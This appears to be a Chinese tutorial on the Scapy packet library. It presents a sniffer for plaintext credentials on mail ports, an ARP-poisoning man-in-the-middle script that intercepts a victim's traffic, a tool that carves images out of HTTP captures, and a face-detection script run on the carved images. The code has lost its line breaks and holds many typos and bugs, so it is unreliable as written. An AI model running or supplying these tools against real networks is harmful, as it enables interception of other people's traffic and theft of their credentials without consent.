Scapy 是一个用来解析底层网络数据包的Python模块和交互式程序,该程序对底层包处理进行了抽象打包,使得对网络数据包的处理非常简便。该类库可以在在网络安全领域有非常广泛用例,可用于漏洞利用开发、数据泄露、网络监听、入侵检测和流量的分析捕获的。Scapy与数据可视化和报告生成集成,可以方便展示起结果和数据。



sniff(filter = " ", iface = "any", prn = function, count = N)

filter参数允许你指定一个Berkeley数据包过滤器(Berkeley Packet Filter,BPF),用于过滤Scapy嗅探到的数据包,也可以将此参数留空,表示要嗅探所有的数据包。



from scapy.all import sniffdef packet_callback(packet):    print(packet.show())def main():    sniff(pro=packet_callback, count=1)if __name__ == '__main__':    main()





from scapy.all import sniff, TCP, IP#the packet callbackdef packet_callback(packet):    if packet[TCP].payload:        mypacket = str(packet[TCP].paylaod)        if 'user' in mypacket.lower() or 'pass' in mypacket.lower():            print(f"[*] Destination: {packet[IP].dst}")            print(f"[*] {str(packet[TCP].payload)}")def main():    #fire up the sniffer    sniff(filter='tcp port 110 or tcp port 25 or tcp port 143',prn=packet_callback, store=0)#监听邮件协议常用端口#新参数store,把它设为0以后,Scapy就不会将任何数据包保留在内存里if __name__ == '__main__':    main()





from multiprocessing import Processfrom scapy.all import (ARP, Ether, conf, get_if_hwaddr, send, sniff, sndrcv, srp, wrpcap)import osimport sysimport timedef get_mac(targetip):    packet = Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(op="who-has", pdst=targetip)    resp, _= srp(packet, timeout=2, retry=10, verbose=False)    for _, r in resp:        return r[Ether].src    return None    class Arper:    def __init__(self, victim, gateway, interface='en0'):        self.victim = victim        self.victimmac = get_mac(victim)        self.gateway = gateway        self.gatewaymac = get_mac(gateway)        self.interface = interface        conf.iface = interface        conf.verb = 0        print(f'Initialized {interface}:')        print(f'Gateway ({gateway}) is at {self.gateway}')        print(f'Victim ({victim}) is at {self.gatewaymac}')        print('_'*30)        def run(self):        self.poison_thread = Process(target=self.poison)        self.poison_thread.start()        self.sniff_thread = Process(target=self.sniff)        self.sniff_thread.start()    def poison(self):        poison_victim = ARP()        poison_victim.op = 2        poison_victim.psrc = self.gateway        poison_victim.pdst = self.victim        poison_victim.hwdst = self.victimmac        print(f'ip src: {poison_victim.psrc}')        print(f'ip dst: {poison_victim.pdst}')        print(f'mac dst: {poison_victim.hwdst}')        print(f'mac src: {poison_victim.hwsrc}')        print(poison_victim.summary())        print('_'*30)        poison_gateway = ARP()        poison_gateway.op = 2        poison_gateway.psrc = self,victim         poison_gateway.pdst = self.gateway        poison_gateway.hwdst = self.gatewaymac        print(f'ip src: {poison_gateway.psrc}')        print(f'ip dst: {poison_gateway.pdst}')        print(f'mac dst: {poison_gateway.hwdst}')        print(f'mac_src: {poison_gateway.hwsrc}')        print(poison_gateway.summary())        print('_'*30)        print(f'Beginning the ARP poison. [CTRL -C to stop]')        while True:            sys.stdout.write('.')            sys.stdout.flush()            try:                send(poison_victim)                send(poison_gateway)            except KeyboardInterrupt:                self.restore()                sys.exit()            else:                time.sleep(2)    def sniff(self, count=200):        time.sleep(5)        print(f'Sniffing {count} packets')        bpf_filter = "ip host %s" % victim        packets = sniff(count=count, filter=bpf_filter, ifcae=self.interface)        wrpcap('arper.pcap', packets)        print('Got the packets')        self.restore()        self.poison_thread.terminate()        print('Finished')    def restore(self):        print('Restoring ARP tables...')        send(ARP(            op=2,            psrc=self.gateway,            hwsrc=self.gatewaymac,            pdst=self.victim,            hwdst='ff:ff:ff:ff:ff:ff'),            count=5)        send(ARP(            op=2,            psrc=self.victim,            hwsrc=self.victimmac,            pdst=self.gateway,            hwdst='ff:ff:ff:ff:ff:ff'),            count=5)                if __name__ == '__main__':    (victim, gateway, interface) = (sys.argv[1], sys.argv[2], sys.argv[3])    myarp = Arper(victim, gateway, interface)    myarp.run()



from scapy.all import TCP, rdpcapimport collectionsimport osimport reimport sysimport zlibOUTDIR = '/root/Desktop/pictures'PCAPS = '/root/Downloads'Response = collections.namedtuple('Response', ['header','payload'])def get_header(payload):    try:        header_raw = payload[:payload.index(b'

')+2]    except ValueError:        sys.stdout.write('_')        sys.stdout.flush()        return None        header = dict(re.findall(r'?P<name>.*?): (?P<value>.*?)
', header_raw.decode()))    if 'Content-Type' not in header:        return None    return headerdef extract_content(Response, content_name='image'):    content, content_type = None, None    if content_name in Response.header['Content-Type']:        content_type = Response.header['Content-Type'].split('/')[1]        content = Response.payload[Response.payload.index(b'

')+4:]        if 'Content-Encoding' in Response.header:            if Response.header['Content-Encoding'] == "gzip":                content = zlib.decompress(Response.payload, zlib.MAX_wbits | 32)            elif Response.header['Content-Encoding'] == "deflate":                content = zlib.decompress(Response.payload)         return content, content_typeclass Recapper:    def __init__(self, fname):        pcap = rdpcap(fname)        self.session = pcap.session()        self.responses = list()    def get_responses(self):        for session in self.session:            payload = b''            for packet in self.session[session]:                try:                    if packet[TCP].dport == 80 or packet[TCP].sport == 80:                        payload += bytes(packet[TCP].payload)                except IndexError:                    sys.stdout.write('x')                    sys.stdout.flush()                    if payload:                header = get_header(payload)                if header is None:                    continue            self.responses.append(Response(header=header, payload=payload))    def write(self, content_name):        for i, response in enumerate(self.responses):            content, content_type = extract_content(response, content_name)            if content and content_type:                fname = os.path.join(OUTDIR, f'ex_{i}.{content_type}')                print(f'Writing {fname}')                with open(fname, 'wb') as f:                    f.write(content)if __name__ == '__main__':    pfile = os.path.join(PCAPS, 'pcap.pcap')    recapper = Recapper(pfile)    recapper.get_responses()    recapper.write('image')



import cv2import osROOT = '/root/Desktop/pictures'FACES = '/root/Desktop/faces'TRAIN = '/root/Desktop/training'def detect(srcdir=ROOT, tgtdir=FACES, train_dir=TRAIN):    for fname in os.listdir(srcdir):        if not fname.upper().endswith('.JPG'):            continue        fullname = os.path.join(srcdir, fname)        newname = os.path.join(tgtdir, fname)        img = cv2.imread(fullname)        if img is None:            continue        gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)        training = os.path.join(train_dir, 'haarcascade_frontalface_alt.xml')        cascade = cv2.CascadeClassifier(training)        rects = cascade.detectMultiScale(gray, 1.3,5)        try:            if rects.any():                print('Got a face')                rects[:, 2:] += rects[:, :2]        except AttributeError:            print(f'No faces fount in {fname}')            continue        # highlight the faces in the image        for x1, y1, x2, y2 in rects:            cv2.rectangle(img, (x1, y1), (x2, y2), (127, 255, 0), 2)        cv2.imwrite(newname, img)if name == '__main__':    detect()



